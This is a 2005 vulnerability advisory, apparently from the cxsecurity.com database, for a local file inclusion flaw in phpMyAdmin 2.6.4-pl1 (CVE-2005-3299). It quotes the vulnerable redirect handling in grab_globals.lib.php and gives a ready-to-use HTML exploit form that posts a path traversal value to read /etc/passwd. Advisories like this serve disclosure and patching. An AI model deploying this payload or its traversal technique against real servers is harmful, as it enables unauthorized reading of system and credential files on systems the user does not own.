phpMyAdmin Local file inclusion 2.6.4-pl1

2005.10.10
Credit: Maksymilian Arciemowicz
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2005-3299
CWE: N/A


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

[phpMyAdmin Local file inclusion 2.6.4-pl1] Author: Maksymilian Arciemowicz Date: 10.10.2005 - --- 0.Description --- phpMyAdmin 2.6.4 is a tool written in PHP intended to handle the administration of MySQL over the Web. Currently it can create and drop databases, create/drop/alter tables, delete/edit/add fields, execute any SQL statement, manage keys on fields. blablabla... phpMyAdmin is very dangerous script. - --- 1. Local file inclusion (Critical) --- File: ./libraries/grab_globals.lib.php This file is included by many files. Example file index.php - -index.php-- <?php /* $Id: index.php,v 2.14 2004/10/19 17:23:09 nijel Exp $ */ // vim: expandtab sw=4 ts=4 sts=4: /** * Gets core libraries and defines some variables */ require_once('./libraries/grab_globals.lib.php'); require_once('./libraries/common.lib.php'); ... - -index.php-- ok so. In ./libraries/grab_globals.lib.php we have: - -101-104-grab_globals.lib.php--------- if ( ! empty( $__redirect ) ) { require('./' . $__redirect); exit(); } // end if ( ! empty( $__redirect ) ) - -101-104-grab_globals.lib.php--------- But before we have - -53-67-grab_globals.lib.php----------- // check if a subform is submitted $__redirect = NULL; if ( isset( $_POST['usesubform'] ) ) { // if a subform is present and should be used // the rest of the form is deprecated $subform_id = key( $_POST['usesubform'] ); $subform = $_POST['subform'][$subform_id]; $_POST = $subform; if ( isset( $_POST['redirect'] ) && $_POST['redirect'] != basename( $_SERVER['PHP_SELF'] ) ) { $__redirect = $_POST['redirect']; unset( $_POST['redirect'] ); } // end if ( isset( $_POST['redirect'] ) ) } // end if ( isset( $_POST['usesubform'] ) ) // end check if a subform is submitted - -53-67-grab_globals.lib.php----------- If varible $_POST['usesubform'] exists and is array, that we can created new varibles for $_POST (example $_POST['redirect']). $subform = $_POST['subform'][$subform_id]; $_POST = $subform; where array $_POST = array $_POST[subform][1] that $_POST['redirect']=$_POST[subform][1][redirect] and we have local file inclusion. Example response in html: - -Exploit--- <CENTER> <A HREF="http://cxsecurity.com><IMG SRC="http://cxsecurity.com/gfx/small_logo.png"></A><P> <FORM action="http://localhost/phpMyAdmin-2.6.4-pl1/index.php" method=post enctype="multipart/form-data"> <input TYPE="hidden" name="usesubform[1]" value="1"> <input TYPE="hidden" name="usesubform[2]" value="1"> <input TYPE="text" name="subform[1][redirect]" value="../../../../../../../etc/passwd" size=30> File<p> <input TYPE="hidden" name="subform[1][cXIb8O3]" value="1"> <input TYPE="submit" value="Exploit"> </FORM> - -Exploit--- Exploit: http://cxsecurity.com/cxexploit/2 - --- 2.Contact --- Author: Maksymilian Arciemowicz


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top